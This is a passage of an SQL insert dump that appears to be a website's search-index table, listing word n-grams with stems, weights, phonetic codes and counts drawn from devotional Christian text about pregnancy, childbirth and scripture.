(223016, 'thy way prosperous', 'thy way prosperous', 0, 1, 1.6, 'T162162', 1, '*'),
(223017, 'thy works and', 'thy works and', 0, 1, 1.4333, 'T6253', 1, '*'),
(223018, 'time no', 'time no', 0, 1, 1.2333, 'T500', 1, '*'),
(223019, 'time no premature', 'time no premature', 0, 1, 1.5667, 'T516536', 1, '*'),
(223020, 'times daily', 'time daily', 0, 1, 1.3667, 'T5234', 1, '*'),
(223021, 'times daily morning', 'time daily morning', 0, 1, 1.6333, 'T52345652', 1, '*'),
(223022, 'to all that', 'to all that', 0, 1, 1.3667, 'T430', 1, '*'),
(223023, 'to all their', 'to all their', 0, 1, 1.4, 'T436', 1, '*'),
(223024, 'to any', 'to any', 0, 1, 1.2, 'T500', 1, '*'),
(223025, 'to any demonic', 'to any demonic', 0, 1, 1.4667, 'T5352', 1, '*'),
(223026, 'to be delivered', 'to be delivered', 0, 1, 1.5, 'T134163', 1, '*'),
(223027, 'to do according', 'to do according', 0, 1, 1.5, 'T26352', 1, '*'),
(223028, 'to do well', 'to do well', 0, 1, 1.3333, 'T400', 1, '*'),
(223029, 'to keep house', 'to keep house', 0, 1, 1.4333, 'T212', 1, '*'),
(223030, 'to me before', 'to me before', 0, 1, 1.4, 'T516', 1, '*'),
(223031, 'to my', 'to my', 0, 1, 1.1667, 'T500', 2, '*'),
(223032, 'to my words', 'to my words', 0, 1, 1.3667, 'T5632', 1, '*'),
(223033, 'to pass when', 'to pass when', 0, 1, 1.4, 'T125', 1, '*'),
(223034, 'to term', 'to term', 0, 1, 1.2333, 'T650', 1, '*'),
(223035, 'to term in', 'to term in', 0, 1, 1.3333, 'T650', 1, '*'),
(223036, 'to the birth', 'to the birth', 0, 1, 1.4, 'T163', 1, '*'),
(223037, 'to thy', 'to thy', 0, 1, 1.2, 'T000', 1, '*'),
(223038, 'to thy husband', 'to thy husband', 0, 1, 1.4667, 'T2153', 1, '*'),
(223039, 'travail', 'travail', 0, 0, 0.4667, 'T614', 1, '*'),
(223040, 'travail i', 'travail i', 0, 1, 1.3, 'T614', 1, '*'),
(223041, 'travail i bring', 'travail i bring', 0, 1, 1.5, 'T6141652', 1, '*'),
(223042, 'travailed', 'travail', 0, 0, 0.6, 'T6143', 1, '*'),
(223043, 'travailed she', 'travail she', 0, 1, 1.4333, 'T61432', 1, '*'),
(223044, 'travailed she brought', 'travail she brought', 0, 1, 1.7, 'T614321623', 1, '*'),
(223045, 'tree christ', 'tree christ', 0, 1, 1.3667, 'T62623', 1, '*'),
(223046, 'tree christ has', 'tree christ has', 0, 1, 1.5, 'T626232', 1, '*'),
(223047, 'tree planted', 'tree planted', 0, 1, 1.4, 'T61453', 1, '*'),
(223048, 'tree planted by', 'tree planted by', 0, 1, 1.5, 'T614531', 1, '*'),
(223049, 'triumph', 'triumph', 0, 0, 0.4667, 'T651', 1, '*'),
(223050, 'triumph against', 'triumph against', 0, 1, 1.5, 'T6512523', 1, '*'),
(223051, 'triumph against all', 'triumph against all', 0, 1, 1.6333, 'T65125234', 1, '*'),
(223052, 'twins', 'twin', 0, 0, 0.3333, 'T520', 1, '*'),
(223053, 'twins in', 'twin in', 0, 1, 1.2667, 'T525', 1, '*'),
(223054, 'twins in her', 'twin in her', 0, 1, 1.4, 'T5256', 1, '*'),
(223055, 'unbeliever without', 'unbeliev without', 0, 1, 1.6, 'U514163', 1, '*'),
(223056, 'unbeliever without god', 'unbeliev without god', 0, 1, 1.7333, 'U51416323', 1, '*'),
(223057, 'unperfect', 'unperfect', 0, 0, 0.6, 'U516123', 1, '*'),
(223058, 'unperfect and', 'unperfect and', 0, 1, 1.4333, 'U51612353', 1, '*'),
(223059, 'unperfect and in', 'unperfect and in', 0, 1, 1.5333, 'U516123535', 1, '*'),
(223060, 'unto her', 'unto her', 0, 1, 1.2667, 'U536', 1, '*'),
(223061, 'unto her fear', 'unto her fear', 0, 1, 1.4333, 'U53616', 1, '*'),
(223062, 'unto me o', 'unto me o', 0, 1, 1.3, 'U535', 1, '*'),
(223063, 'unto my', 'unto my', 0, 1, 1.2333, 'U535', 1, '*'),
(223064, 'unto my saying', 'unto my saying', 0, 1, 1.4667, 'U535252', 1, '*'),
(223065, 'unto pharaoh', 'unto pharaoh', 0, 1, 1.4, 'U5316', 1, '*'),
(223066, 'unto pharaoh because', 'unto pharaoh because', 0, 1, 1.6667, 'U531612', 1, '*'),
(223067, 'unto them.”', 'unto them.”', 0, 1, 1.3667, 'U535', 1, '*'),
(223068, 'unto them.” i', 'unto them.” i', 0, 1, 1.4333, 'U535', 1, '*'),
(223069, 'unto those', 'unto those', 0, 1, 1.3333, 'U532', 1, '*'),
(223070, 'unto those that', 'unto those that', 0, 1, 1.5, 'U5323', 1, '*'),
(223071, 'up to term', 'up to term', 0, 1, 1.3333, 'U1365', 1, '*'),
(223072, 'upon the midwives', 'upon the midwives', 0, 1, 1.5667, 'U1535312', 1, '*'),
(223073, 'us for it', 'us for it', 0, 1, 1.3, 'U2163', 1, '*'),
(223074, 'vacuum', 'vacuum', 0, 0, 0.4, 'V250', 1, '*'),
(223075, 'vacuum pump', 'vacuum pump', 0, 1, 1.3667, 'V25151', 1, '*'),
(223076, 'vacuum pump it', 'vacuum pump it', 0, 1, 1.4667, 'V251513', 1, '*'),
(223077, 'very well no', 'veri well no', 0, 1, 1.4, 'V645', 1, '*'),
(223078, 'voice of thy', 'voic of thy', 0, 1, 1.4, 'V213', 1, '*'),
(223079, 'was a goodly', 'wa a goodly', 0, 1, 1.4, 'W234', 1, '*'),
(223080, 'was delivered', 'wa delivered', 0, 1, 1.4333, 'W234163', 1, '*'),
(223081, 'was delivered of', 'wa delivered of', 0, 1, 1.5333, 'W2341631', 1, '*'),
(223082, 'was in', 'wa in', 0, 1, 1.2, 'W250', 3, '*'),
(223083, 'was in hard', 'wa in hard', 0, 1, 1.3667, 'W2563', 1, '*'),
(223084, 'was made', 'wa made', 0, 1, 1.2667, 'W253', 1, '*'),
(223085, 'was made in', 'wa made in', 0, 1, 1.3667, 'W2535', 1, '*'),
(223086, 'was none', 'wa none', 0, 1, 1.2667, 'W250', 1, '*'),
(223087, 'was none of', 'wa none of', 0, 1, 1.3667, 'W251', 1, '*'),
(223088, 'was not hid', 'wa not hid', 0, 1, 1.3667, 'W253', 1, '*'),
(223089, 'water that', 'water that', 0, 1, 1.3333, 'W363', 1, '*'),
(223090, 'water that bringeth', 'water that bringeth', 0, 1, 1.6333, 'W36316523', 1, '*'),
(223091, 'way prosperous', 'wai prosperous', 0, 1, 1.4667, 'W162162', 1, '*'),
(223092, 'way prosperous and', 'wai prosperous and', 0, 1, 1.6, 'W16216253', 1, '*'),
(223093, 'weak i', 'weak i', 0, 1, 1.2, 'W200', 1, '*'),
(223094, 'weak i have', 'weak i have', 0, 1, 1.3667, 'W210', 1, '*'),
(223095, 'well conclusion', 'well conclusion', 0, 1, 1.5, 'W4252425', 1, '*'),
(223096, 'well conclusion joshua', 'well conclusion joshua', 0, 1, 1.7333, 'W42524252', 1, '*'),
(223097, 'well my', 'well my', 0, 1, 1.2333, 'W450', 1, '*'),
(223098, 'well my baby', 'well my baby', 0, 1, 1.4, 'W451', 1, '*'),
(223099, 'well no', 'well no', 0, 1, 1.2333, 'W450', 1, '*'),
(223100, 'well no delay', 'well no delay', 0, 1, 1.4333, 'W4534', 1, '*'),
(223101, 'well no malformation', 'well no malformation', 0, 1, 1.6667, 'W45416535', 1, '*'),
(223102, 'well phil', 'well phil', 0, 1, 1.3, 'W414', 1, '*'),
(223103, 'well phil 4', 'well phil 4', 0, 1, 1.3667, 'W414', 1, '*'),
(223104, 'well satisfied', 'well satisfied', 0, 1, 1.4667, 'W423213', 1, '*'),
(223105, 'well satisfied with', 'well satisfied with', 0, 1, 1.6333, 'W423213', 1, '*'),
(223106, 'well.”', 'well.”', 0, 0, 0.4, 'W400', 1, '*'),
(223107, 'well.” 15', 'well.” 15', 0, 1, 1.3, 'W400', 1, '*'),
(223108, 'well.” 15 “my', 'well.” 15 “my', 0, 1, 1.4333, 'W450', 1, '*'),
(223109, 'were fashioned', 'were fashioned', 0, 1, 1.4667, 'W61253', 1, '*'),
(223110, 'were fashioned when', 'were fashioned when', 0, 1, 1.6333, 'W612535', 1, '*'),
(223111, 'were fulfilled', 'were fulfilled', 0, 1, 1.4667, 'W614143', 1, '*'),
(223112, 'were fulfilled behold', 'were fulfilled behold', 0, 1, 1.7, 'W614143143', 1, '*'),
(223113, 'were twins', 'were twins', 0, 1, 1.3333, 'W6352', 1, '*'),
(223114, 'were twins in', 'were twins in', 0, 1, 1.4333, 'W63525', 1, '*'),
(223115, 'were written', 'were written', 0, 1, 1.4, 'W635', 1, '*'),
(223116, 'were written which', 'were written which', 0, 1, 1.6, 'W6352', 1, '*'),
(223117, 'whatsoever he doeth', 'whatsoev he doeth', 0, 1, 1.6333, 'W32163', 1, '*'),
(223118, 'when as', 'when as', 0, 1, 1.2333, 'W520', 1, '*'),
(223119, 'when as yet', 'when as yet', 0, 1, 1.3667, 'W523', 1, '*'),
(223120, 'when her', 'when her', 0, 1, 1.2667, 'W560', 1, '*'),
(223121, 'when her days', 'when her days', 0, 1, 1.4333, 'W5632', 1, '*'),
(223122, 'when i awake', 'when i awake', 0, 1, 1.4, 'W520', 1, '*'),
(223123, 'when i was', 'when i was', 0, 1, 1.3333, 'W520', 2, '*'),
(223124, 'when it pleased', 'when it pleased', 0, 1, 1.5, 'W531423', 1, '*'),
(223125, 'when she', 'when she', 0, 1, 1.2667, 'W520', 2, '*'),
(223126, 'when she saw', 'when she saw', 0, 1, 1.4, 'W520', 1, '*'),
(223127, 'when she was', 'when she was', 0, 1, 1.4, 'W520', 2, '*'),
(223128, 'which in', 'which in', 0, 1, 1.2667, 'W250', 1, '*'),
(223129, 'which in continuance', 'which in continuance', 0, 1, 1.6667, 'W2525352', 1, '*'),
(223130, 'which strengtheneth', 'which strengtheneth', 0, 1, 1.6333, 'W23652353', 1, '*'),
(223131, 'which strengtheneth me.”', 'which strengtheneth me.”', 0, 1, 1.8, 'W236523535', 1, '*'),
(223132, 'who hath', 'who hath', 0, 1, 1.2667, 'W300', 1, '*'),
(223133, 'who hath seen', 'who hath seen', 0, 1, 1.4333, 'W325', 1, '*'),
(223134, 'who separated', 'who separated', 0, 1, 1.4333, 'W2163', 1, '*'),
(223135, 'who separated me', 'who separated me', 0, 1, 1.5333, 'W21635', 1, '*'),
(223136, 'who survives', 'who survives', 0, 1, 1.4, 'W2612', 1, '*'),
(223137, 'who survives and', 'who survives and', 0, 1, 1.5333, 'W261253', 1, '*'),
(223138, 'wicked o', 'wick o', 0, 1, 1.2667, 'W230', 1, '*'),
(223139, 'wicked o god', 'wick o god', 0, 1, 1.4, 'W2323', 1, '*'),
(223140, 'wife and', 'wife and', 0, 1, 1.2667, 'W153', 1, '*'),
(223141, 'wife and she', 'wife and she', 0, 1, 1.4, 'W1532', 1, '*'),
(223142, 'will attend', 'will attend', 0, 1, 1.3667, 'W4353', 1, '*'),
(223143, 'will attend to', 'will attend to', 0, 1, 1.4667, 'W4353', 1, '*'),
(223144, 'will be easy', 'will be easy', 0, 1, 1.4, 'W412', 1, '*'),
(223145, 'will do what', 'will do what', 0, 1, 1.4, 'W430', 1, '*'),
(223146, 'will fulfill', 'will fulfill', 0, 1, 1.4, 'W41414', 2, '*'),
(223147, 'will fulfill luke', 'will fulfill luke', 0, 1, 1.5667, 'W414142', 1, '*'),
(223148, 'will greatly', 'will greatly', 0, 1, 1.4, 'W42634', 1, '*'),
(223149, 'will greatly multiply', 'will greatly multiply', 0, 1, 1.7, 'W4263454314', 1, '*'),
(223150, 'will not cast', 'will not cast', 0, 1, 1.4333, 'W45323', 1, '*'),
(223151, 'will praise', 'will praise', 0, 1, 1.3667, 'W4162', 1, '*'),
(223152, 'will praise thee', 'will praise thee', 0, 1, 1.5333, 'W41623', 1, '*'),
(223153, 'wilt', 'wilt', 0, 0, 0.2667, 'W430', 1, '*'),
(223154, 'wilt slay', 'wilt slay', 0, 1, 1.3, 'W4324', 1, '*'),
(223155, 'wilt slay the', 'wilt slay the', 0, 1, 1.4333, 'W43243', 1, '*'),
(223156, 'with my breast', 'with my breast', 0, 1, 1.4667, 'W351623', 1, '*'),
(223157, 'with pitosin', 'with pitosin', 0, 1, 1.4, 'W31325', 1, '*'),
(223158, 'with pitosin not', 'with pitosin not', 0, 1, 1.5333, 'W313253', 1, '*'),
(223159, 'with the abundance', 'with the abundance', 0, 1, 1.6, 'W315352', 1, '*'),
(223160, 'with the breasts', 'with the breasts', 0, 1, 1.5333, 'W316232', 1, '*'),
(223161, 'with thee.”', 'with thee.”', 0, 1, 1.3667, 'W300', 1, '*'),
(223162, 'with thee.” 19.“surely', 'with thee.” 19.“surely', 0, 1, 1.7333, 'W3264', 1, '*'),
(223163, 'wither', 'wither', 0, 0, 0.4, 'W360', 1, '*'),
(223164, 'wither and', 'wither and', 0, 1, 1.3333, 'W3653', 1, '*'),
(223165, 'wither and whatsoever', 'wither and whatsoever', 0, 1, 1.7, 'W3653216', 1, '*'),
(223166, 'without complications', 'without complications', 0, 1, 1.7, 'W325142352', 1, '*'),
(223167, 'without complications in', 'without complications in', 0, 1, 1.8, 'W3251423525', 1, '*'),
(223168, 'without covenant', 'without covenant', 0, 1, 1.5333, 'W32153', 1, '*'),
(223169, 'without covenant i', 'without covenant i', 0, 1, 1.6, 'W32153', 1, '*'),
(223170, 'without god', 'without god', 0, 1, 1.3667, 'W323', 1, '*'),
(223171, 'without god without', 'without god without', 0, 1, 1.6333, 'W323', 1, '*'),
(223172, 'woman gal', 'woman gal', 0, 1, 1.3, 'W524', 1, '*'),
(223173, 'woman gal 3', 'woman gal 3', 0, 1, 1.3667, 'W524', 1, '*'),
(223174, 'woman he', 'woman he', 0, 1, 1.2667, 'W500', 1, '*'),
(223175, 'woman he said', 'woman he said', 0, 1, 1.4333, 'W523', 1, '*'),
(223176, 'woman to', 'woman to', 0, 1, 1.2667, 'W530', 1, '*'),
(223177, 'woman to keep', 'woman to keep', 0, 1, 1.4333, 'W5321', 1, '*'),
(223178, 'womb', 'womb', 0, 0, 0.2667, 'W510', 3, '*'),
(223179, 'womb and', 'womb and', 0, 1, 1.2667, 'W5153', 1, '*'),
(223180, 'womb and called', 'womb and called', 0, 1, 1.5, 'W5153243', 1, '*'),
(223181, 'womb fearfully', 'womb fearfully', 0, 1, 1.4667, 'W51614', 1, '*'),
(223182, 'womb fearfully and', 'womb fearfully and', 0, 1, 1.6, 'W5161453', 1, '*'),
(223183, 'womb for', 'womb for', 0, 1, 1.2667, 'W516', 2, '*'),
(223184, 'womb for joy.”', 'womb for joy.”', 0, 1, 1.4667, 'W5162', 1, '*'),
(223185, 'womb gen', 'womb gen', 0, 1, 1.2667, 'W5125', 1, '*'),
(223186, 'womb gen 35', 'womb gen 35', 0, 1, 1.3667, 'W5125', 1, '*'),
(223187, 'womb opens', 'womb opens', 0, 1, 1.3333, 'W5152', 1, '*'),
(223188, 'womb opens very', 'womb opens very', 0, 1, 1.5, 'W515216', 1, '*'),
(223189, 'womb psalm', 'womb psalm', 0, 1, 1.3333, 'W51245', 1, '*'),
(223190, 'womb psalm 113', 'womb psalm 113', 0, 1, 1.4667, 'W51245', 1, '*'),
(223191, 'womb saith', 'womb saith', 0, 1, 1.3333, 'W5123', 1, '*'),
(223192, 'womb saith thy', 'womb saith thy', 0, 1, 1.4667, 'W5123', 1, '*'),
(223193, 'womb self-normal-delivery', 'womb self-normal-delivery', 0, 1, 1.8333, 'W5124156543416', 1, '*'),
(223194, 'womb self-normal-delivery in', 'womb self-normal-delivery in', 0, 1, 1.9333, 'W51241565434165', 1, '*'),
(223195, 'womb.”', 'womb.”', 0, 0, 0.4, 'W510', 1, '*'),
(223196, 'womb.” 14', 'womb.” 14', 0, 1, 1.3, 'W510', 1, '*'),
(223197, 'womb.” 14 “i', 'womb.” 14 “i', 0, 1, 1.4, 'W510', 1, '*'),
(223198, 'womb.” my', 'womb.” my', 0, 1, 1.3, 'W515', 1, '*'),
(223199, 'womb.” my days', 'womb.” my days', 0, 1, 1.4667, 'W51532', 1, '*'),
(223200, 'women are', 'women are', 0, 1, 1.3, 'W560', 1, '*'),
(223201, 'women are not', 'women are not', 0, 1, 1.4333, 'W5653', 1, '*'),
(223202, 'women for', 'women for', 0, 1, 1.3, 'W516', 1, '*'),
(223203, 'women for they', 'women for they', 0, 1, 1.4667, 'W5163', 1, '*'),
(223204, 'wonderfully', 'wonderfulli', 0, 0, 0.7333, 'W53614', 1, '*'),
(223205, 'wonderfully made', 'wonderfulli made', 0, 1, 1.5333, 'W5361453', 1, '*'),
(223206, 'wonderfully made gen', 'wonderfulli made gen', 0, 1, 1.6667, 'W536145325', 1, '*'),
(223207, 'wonderfully made marvelous', 'wonderfulli made marvelous', 0, 1, 1.8667, 'W536145356142', 1, '*'),
(223208, 'words incline', 'word incline', 0, 1, 1.4333, 'W6325245', 1, '*'),
(223209, 'words incline thine', 'word incline thine', 0, 1, 1.6333, 'W632524535', 1, '*'),
(223210, 'works and', 'work and', 0, 1, 1.3, 'W6253', 1, '*'),
(223211, 'works and that', 'work and that', 0, 1, 1.4667, 'W6253', 1, '*'),
(223212, 'written cursed', 'written cursed', 0, 1, 1.4667, 'W6352623', 1, '*'),
(223213, 'written cursed is', 'written cursed is', 0, 1, 1.5667, 'W63526232', 1, '*'),
(223214, 'written therein', 'written therein', 0, 1, 1.5, 'W635365', 1, '*'),
(223215, 'written therein for', 'written therein for', 0, 1, 1.6333, 'W63536516', 1, '*'),
(223216, 'written which', 'written which', 0, 1, 1.4333, 'W6352', 1, '*'),
(223217, 'written which in', 'written which in', 0, 1, 1.5333, 'W63525', 1, '*'),
(223218, 'wrought', 'wrought', 0, 0, 0.4667, 'W623', 1, '*'),
(223219, 'wrought in', 'wrought in', 0, 1, 1.3333, 'W6235', 1, '*'),
(223220, 'wrought in the', 'wrought in the', 0, 1, 1.4667, 'W62353', 1, '*'),
(223221, 'ye bloody', 'ye bloody', 0, 1, 1.3, 'Y143', 1, '*'),
(223222, 'ye bloody men.”', 'ye bloody men.”', 0, 1, 1.5, 'Y1435', 1, '*'),
(223223, 'ye may', 'ye may', 0, 1, 1.2, 'Y500', 1, '*'),
(223224, 'ye may milk', 'ye may milk', 0, 1, 1.3667, 'Y542', 1, '*'),
(223225, 'ye may suck', 'ye may suck', 0, 1, 1.3667, 'Y520', 1, '*'),
(223226, 'ye the', 'ye the', 0, 1, 1.2, 'Y300', 1, '*'),
(223227, 'ye the lord.”', 'ye the lord.”', 0, 1, 1.4333, 'Y3463', 1, '*'),
(223228, 'yet being', 'yet being', 0, 1, 1.3, 'Y3152', 1, '*'),
(223229, 'yet being unperfect', 'yet being unperfect', 0, 1, 1.6333, 'Y3152516123', 1, '*'),
(223230, 'yet there', 'yet there', 0, 1, 1.3, 'Y360', 1, '*'),
(223231, 'yet there was', 'yet there was', 0, 1, 1.4333, 'Y362', 1, '*'),
(223232, 'you can even', 'you can even', 0, 1, 1.4, 'Y2515', 1, '*'),
(223233, 'young before', 'young before', 0, 1, 1.4, 'Y5216', 1, '*'),
(223234, 'young before the', 'young before the', 0, 1, 1.5333, 'Y52163', 1, '*'),
(223235, 'young nor', 'young nor', 0, 1, 1.3, 'Y5256', 1, '*'),
(223236, 'young nor be', 'young nor be', 0, 1, 1.4, 'Y52561', 1, '*'),
(223237, 'your daily confession', 'your daily confession', 0, 1, 1.7, 'Y63425125', 1, '*'),
(223238, 'zion travailed', 'zion travailed', 0, 1, 1.4667, 'Z536143', 1, '*'),
(223239, 'zion travailed she', 'zion travailed she', 0, 1, 1.6, 'Z5361432', 1, '*'),
(223240, '“and adam', '“and adam', 0, 1, 1.3, '“535', 1, '*'),
(223241, '“and adam knew', '“and adam knew', 0, 1, 1.4667, '“53525', 1, '*'),
(223242, '“and he', '“and he', 0, 1, 1.2333, '“530', 1, '*'),
(223243, '“and he shall', '“and he shall', 0, 1, 1.4333, '“5324', 1, '*'),
(223244, '“and it', '“and it', 0, 1, 1.2333, '“530', 1, '*'),
(223245, '“and it came', '“and it came', 0, 1, 1.4, '“5325', 1, '*'),
(223246, '“and when', '“and when', 0, 1, 1.3, '“535', 1, '*'),
(223247, '“and when her', '“and when her', 0, 1, 1.4333, '“5356', 1, '*'),
(223248, '“before', '“befor', 0, 0, 0.4667, '“160', 1, '*'),
(223249, '“before she', '“befor she', 0, 1, 1.3667, '“162', 1, '*'),
(223250, '“before she travailed', '“befor she travailed', 0, 1, 1.7, '“16236143', 1, '*'),
(223251, '“blessed', '“bless', 0, 0, 0.5333, '“1423', 1, '*'),
(223252, '“blessed shall', '“bless shall', 0, 1, 1.4667, '“142324', 1, '*'),
(223253, '“blessed shall be', '“bless shall be', 0, 1, 1.5667, '“1423241', 1, '*'),
(223254, '“but when', '“but when', 0, 1, 1.3, '“135', 1, '*'),
(223255, '“but when it', '“but when it', 0, 1, 1.4, '“1353', 1, '*'),
(223256, '“christ hath', '“christ hath', 0, 1, 1.4, '“2623', 1, '*'),
(223257, '“christ hath redeemed', '“christ hath redeemed', 0, 1, 1.7, '“26236353', 1, '*'),
(223258, '“for lo', '“for lo', 0, 1, 1.2333, '“164', 1, '*'),
(223259, '“for lo as', '“for lo as', 0, 1, 1.3333, '“1642', 1, '*'),
(223260, '“for thou', '“for thou', 0, 1, 1.3, '“163', 1, '*'),
(223261, '“for thou hast', '“for thou hast', 0, 1, 1.4667, '“16323', 1, '*'),
(223262, '“he', '“he', 0, 0, 0.2, '“000', 1, '*'),
(223263, '“he maketh', '“he maketh', 0, 1, 1.3333, '“523', 1, '*'),
(223264, '“he maketh the', '“he maketh the', 0, 1, 1.4667, '“523', 1, '*'),
(223265, '“how', '“how', 0, 0, 0.2667, '“000', 1, '*'),
(223266, '“how precious', '“how precious', 0, 1, 1.4333, '“162', 1, '*'),
(223267, '“how precious also', '“how precious also', 0, 1, 1.6, '“16242', 1, '*'),
(223268, '“i', '“i', 0, 0, 0.1333, '“000', 1, '*'),
(223269, '“i can', '“i can', 0, 1, 1.2, '“250', 1, '*'),
(223270, '“i can do', '“i can do', 0, 1, 1.3, '“253', 1, '*'),
(223271, '“i will', '“i will', 0, 1, 1.2333, '“400', 1, '*'),
(223272, '“i will praise', '“i will praise', 0, 1, 1.4667, '“4162', 1, '*'),
(223273, '“make', '“make', 0, 0, 0.3333, '“520', 1, '*'),
(223274, '“make these', '“make these', 0, 1, 1.3667, '“5232', 1, '*'),
(223275, '“make these scriptures', '“make these scriptures', 0, 1, 1.7333, '“523261362', 1, '*'),
(223276, '“my', '“my', 0, 0, 0.2, '“500', 1, '*'),
(223277, '“my substance', '“my substance', 0, 1, 1.4333, '“5212352', 1, '*'),
(223278, '“my substance was', '“my substance was', 0, 1, 1.5667, '“5212352', 1, '*'),
(223279, '“shall', '“shall', 0, 0, 0.4, '“240', 1, '*'),
(223280, '“shall i', '“shall i', 0, 1, 1.2667, '“240', 1, '*'),
(223281, '“shall i bring', '“shall i bring', 0, 1, 1.4667, '“241652', 1, '*'),
(223282, '“that ye', '“that ye', 0, 1, 1.2667, '“300', 1, '*'),
(223283, '“that ye may', '“that ye may', 0, 1, 1.4, '“350', 1, '*'),
(223284, '“then', '“then', 0, 0, 0.3333, '“350', 1, '*'),
(223285, '“then shall', '“then shall', 0, 1, 1.3667, '“3524', 1, '*'),
(223286, '“then shall thy', '“then shall thy', 0, 1, 1.5, '“35243', 1, '*'),
(223287, '“there shall', '“there shall', 0, 1, 1.4, '“3624', 1, '*'),
(223288, '“there shall nothing', '“there shall nothing', 0, 1, 1.6667, '“36245352', 1, '*'),
(223289, '“thine', '“thine', 0, 0, 0.4, '“350', 1, '*'),
(223290, '“thine eyes', '“thine eyes', 0, 1, 1.3667, '“352', 1, '*'),
(223291, '“thine eyes did', '“thine eyes did', 0, 1, 1.5, '“3523', 1, '*'),
(223292, '“this book', '“thi book', 0, 1, 1.3333, '“3212', 1, '*'),
(223293, '“this book of', '“thi book of', 0, 1, 1.4333, '“32121', 1, '*'),
(223294, '“unto', '“unto', 0, 0, 0.3333, '“530', 1, '*'),
(223295, '“unto the', '“unto the', 0, 1, 1.3, '“530', 1, '*'),
(223296, '“unto the woman', '“unto the woman', 0, 1, 1.5, '“535', 1, '*'),
(223297, '“who', '“who', 0, 0, 0.2667, '“000', 1, '*'),
(223298, '“who hath', '“who hath', 0, 1, 1.3, '“300', 1, '*'),
(223299, '“who hath heard', '“who hath heard', 0, 1, 1.5, '“363', 1, '*'),
(226204, '2 3', '2 3', 0, 1, 1.1, '', 2, '*'),
(226739, 'you to know', 'you to know', 0, 1, 1.3667, 'Y325', 2, '*'),
(227195, '41', '41', 0, 0, 0.2, '', 2, '*'),
(227252, 'amen till', 'amen till', 0, 1, 1.3, 'A534', 3, '*'),
(227253, 'amen till next', 'amen till next', 0, 1, 1.4667, 'A534523', 3, '*'),
(227261, 'and live by', 'and live by', 0, 1, 1.3667, 'A5341', 3, '*'),
(227329, 'city', 'citi', 0, 0, 0.2667, 'C300', 2, '*'),
(227423, 'focused', 'focus', 0, 0, 0.4667, 'F230', 2, '*'),
(227450, 'god for your', 'god for your', 0, 1, 1.4, 'G316', 2, '*'),
(227507, 'in the life', 'in the life', 0, 1, 1.3667, 'I5341', 2, '*'),
(227625, 'name amen till', 'name amen till', 0, 1, 1.4667, 'N340', 3, '*'),
(227712, 'rebellion', 'rebellion', 0, 0, 0.6, 'R145', 2, '*'),
(227860, 'to correct', 'to correct', 0, 1, 1.3333, 'T2623', 2, '*'),
(227882, 'training that', 'train that', 0, 1, 1.4333, 'T6523', 3, '*'),
(227897, 'use it', 'us it', 0, 1, 1.2, 'U230', 2, '*'),
(227911, 'waste the', 'wast the', 0, 1, 1.3, 'W230', 2, '*'),
(227951, 'years and', 'year and', 0, 1, 1.3, 'Y6253', 4, '*'),
(227965, 'you can be', 'you can be', 0, 1, 1.3333, 'Y251', 3, '*'),
(228209, '2 cor', '2 cor', 0, 1, 1.1667, 'C600', 2, '*'),
(228703, '1 2-4', '1 2-4', 0, 1, 1.1667, '', 2, '*'),
(228749, '1cor.11', '1cor.11', 0, 0, 0.4667, 'C600', 2, '*'),
(228752, '1king', '1king', 0, 0, 0.3333, 'K520', 2, '*'),
(228771, '2-4', '2-4', 0, 0, 0.3, '', 2, '*'),
(228815, '40', '40', 0, 0, 0.2, '', 2, '*'),
(228901, 'be found wanting', 'be found wanting', 0, 1, 1.5333, 'B535352', 2, '*'),
(228952, 'examine yourself', 'examin yourself', 0, 1, 1.5333, 'E256241', 2, '*'),
(228957, 'expressed', 'express', 0, 0, 0.6, 'E21623', 2, '*'),
(228966, 'found wanting', 'found wanting', 0, 1, 1.4333, 'F535352', 3, '*'),
(228978, 'god weighs', 'god weighs', 0, 1, 1.3333, 'G320', 2, '*'),
(229000, 'if you judge', 'if you judge', 0, 1, 1.4, 'I1232', 2, '*'),
(229019, 'james 1 2-4', 'jame 1 2-4', 0, 1, 1.3667, 'J520', 2, '*'),
(229028, 'judge yourself', 'judg yourself', 0, 1, 1.4667, 'J326241', 2, '*'),
(229100, 'of man', 'of man', 0, 1, 1.2, 'O150', 2, '*'),
(229107, 'on the scale', 'on the scale', 0, 1, 1.4, 'O5324', 2, '*'),
(229114, 'path', 'path', 0, 0, 0.2667, 'P300', 3, '*'),
(229115, 'path of', 'path of', 0, 1, 1.2333, 'P310', 2, '*'),
(229194, 'the path', 'the path', 0, 1, 1.2667, 'T130', 2, '*'),
(229195, 'the path of', 'the path of', 0, 1, 1.3667, 'T131', 2, '*'),
(229196, 'the scale', 'the scale', 0, 1, 1.3, 'T240', 2, '*'),
(229263, 'weighed', 'weigh', 0, 0, 0.4667, 'W230', 2, '*'),
(229267, 'weighs', 'weigh', 0, 0, 0.4, 'W200', 2, '*'),
(229287, 'you judge', 'you judge', 0, 1, 1.3, 'Y232', 2, '*'),
(229288, 'you judge yourself', 'you judge yourself', 0, 1, 1.6, 'Y2326241', 2, '*'),
(229290, 'you shall', 'you shall', 0, 1, 1.3, 'Y240', 2, '*'),
(229292, 'you stand', 'you stand', 0, 1, 1.3, 'Y2353', 3, '*'),
(231772, '02 04', '02 04', 0, 1, 1.1667, '', 2, '*'),
(231773, '02 04 2017', '02 04 2017', 0, 1, 1.3333, '', 2, '*'),
(231774, '04', '04', 0, 0, 0.2, '', 7, '*'),
(231775, '04 2017', '04 2017', 0, 1, 1.2333, '', 5, '*'),
(231947, 'god has made', 'god has made', 0, 1, 1.4, 'G3253', 3, '*'),
(231957, 'has made', 'ha made', 0, 1, 1.2667, 'H253', 4, '*'),
(231962, 'heart 02', 'heart 02', 0, 1, 1.2667, 'H630', 4, '*'),
(231963, 'heart 02 04', 'heart 02 04', 0, 1, 1.3667, 'H630', 2, '*'),
(232096, 'promises', 'promis', 0, 0, 0.5333, 'P652', 3, '*'),
(232134, 's heart 02', 's heart 02', 0, 1, 1.3333, 'S630', 4, '*'),
(232240, 'when you come', 'when you come', 0, 1, 1.4333, 'W525', 3, '*'),
(232261, 'you come', 'you come', 0, 1, 1.2667, 'Y250', 3, '*'),
(233336, '3-5', '3-5', 0, 0, 0.3, '', 2, '*'),
(233393, 'became', 'becam', 0, 0, 0.4, 'B250', 3, '*'),
(233420, 'confidently', 'confid', 0, 0, 0.7333, 'C513534', 3, '*'),
(233452, 'eternity', 'etern', 0, 0, 0.5333, 'E3653', 3, '*'),
(233473, 'fit for', 'fit for', 0, 1, 1.2333, 'F316', 3, '*'),
(233506, 'he could', 'he could', 0, 1, 1.2667, 'H243', 4, '*'),
(233515, 'his life and', 'hi life and', 0, 1, 1.4, 'H24153', 2, '*'),
